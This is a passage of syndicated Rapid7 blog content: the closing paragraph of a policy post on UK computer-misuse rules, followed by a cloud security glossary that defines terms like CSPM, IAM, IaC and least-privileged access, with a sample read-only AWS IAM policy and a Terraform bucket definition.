We hope the Home Office will take these concerns into consideration, both in terms of ensuring the necessary support for security testing tools and security research, and also in being cautious not to go so far with authorities that we open the door to abuses. We’ll continue to engage on these topics wherever possible to help policymakers navigate the nuances and keep advancing security.

You can read Rapid7’s full response to the Home Office’s CFI or our detailed CMA position.


Cloud Security Glossary: Key Terms and Definitions

Post Syndicated from Shelby Matthews original https://blog.rapid7.com/2021/08/11/cloud-security-glossary-key-terms-to-know/

Cloud Security Glossary: Key Terms and Definitions

When navigating the complexities of the public cloud, it’s easy to get lost in the endless acronyms, industry jargon, and vendor-specific terms. From K8s to IaC to Shift Left, it can be helpful to have a map to navigate the nuances of this emerging segment of the market.

That’s why a few cloud security experts here at Rapid7 created a list of terms that cover the basics — the key terms and concepts that help you continue your journey into cloud security and DevSecOps with clarity and confidence. Here are the most important entries in your cloud security glossary.


Application Program Interface (API): A set of functions and procedures allowing for the creation of applications that can access the features or data of an operating system, application, or other service.

  • The InsightCloudSec API can be used to create insights and bots, modify compliance packs, and perform other functions outside of the InsightCloudSec user interface.

Cloud Security Posture Management (CSPM): CSPM solutions continuously manage cloud security risk. They detect, log, report, and provide automation to address common issues. These can range from cloud service configurations to security settings and are typically related to governance, compliance, and security for cloud resources.

Cloud Service Provider (CSP): A third-party company that offers a cloud-based platform, infrastructure, application, or storage services. The most popular CSPs are AWS, Azure, Alibaba, and GCP.

Cloud Workload Protection Program (CWPP): CWPPs help organizations protect their capabilities or workloads (applications, resources, etc.) running in a cloud instance.

Container Security: A container represents a software application and may contain all necessary code, run-time, system tools, and libraries needed to run the application. Container hosts can be packed with risk, so properly securing them means maintaining visibility into vulnerabilities associated with their components and layers.

Entitlements: Entitlements, or permissions entitlements, give domain users control over basic users’ and organization admins’ permissions to access certain parts of a tool.

Identity and Access Management (IAM): A framework of policies and technologies for ensuring the right users have the appropriate access to technology resources. In cloud environments, IAM is closely related to Cloud Infrastructure Entitlement Management (CIEM), which provides identity and access governance controls with the goal of reducing excessive cloud infrastructure entitlements and streamlining least-privileged access (LPA) protocols across dynamic, distributed cloud environments.
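Least-privileged access is easiest to see in a concrete policy document. A hypothetical AWS IAM policy (the bucket name is invented) that grants read-only access to a single S3 bucket instead of blanket `s3:*` permissions:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "ReadOnlyOneBucket",
      "Effect": "Allow",
      "Action": ["s3:GetObject", "s3:ListBucket"],
      "Resource": [
        "arn:aws:s3:::example-reports-bucket",
        "arn:aws:s3:::example-reports-bucket/*"
      ]
    }
  ]
}
```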

Infrastructure: With respect to cloud computing, infrastructure refers to an enterprise’s entire cloud-based or local collection of resources and services. This term is used synonymously with “cloud footprint.”

Infrastructure as Code (IaC): The process of managing and provisioning computer data centers through machine-readable definition files, rather than physical hardware configuration or interactive configuration tools. With IaC, configuration files contain your infrastructure specifications, making it easier to edit and distribute configurations.
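As a concrete illustration of the definition above, a Terraform-style configuration file (resource and bucket names here are hypothetical) declares the desired infrastructure, and the tooling converges the environment to match it:

```hcl
# Declare an S3 bucket and enable versioning on it.
resource "aws_s3_bucket" "log_archive" {
  bucket = "example-app-log-archive"
}

resource "aws_s3_bucket_versioning" "log_archive" {
  bucket = aws_s3_bucket.log_archive.id
  versioning_configuration {
    status = "Enabled"
  }
}
```

Because the file is plain text, it can be versioned, reviewed, and reused like any other code, which is the point of the "easier to edit and distribute" claim.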

Kubernetes: A portable, extensible open-source platform for deploying, managing, and orchestrating containerized workloads and services at scale.

Least-Privileged Access (LPA): A security and access control concept that gives users the minimum necessary permissions based on the functions required for their particular roles.

Shared Responsibility Model: A framework in cloud computing that defines who is responsible for the security and compliance of each component of the cloud architecture. With on-premise data centers, the responsibility is solely on your organization to manage and maintain security for the entire technology stack, from the physical hardware to the applications and data. Because public cloud computing purposefully abstracts layers of that tech stack, this model acts as an agreement between the CSP and their customer as to who takes on the responsibility of managing and maintaining proper hygiene and security within the cloud infrastructure.

Shift Left: A concept that refers to building security into an earlier stage of the development cycle. Traditionally, security checks occurred at the end of the cycle. By shifting left, organizations can ensure their applications are more secure from the start — and at a much lower cost.
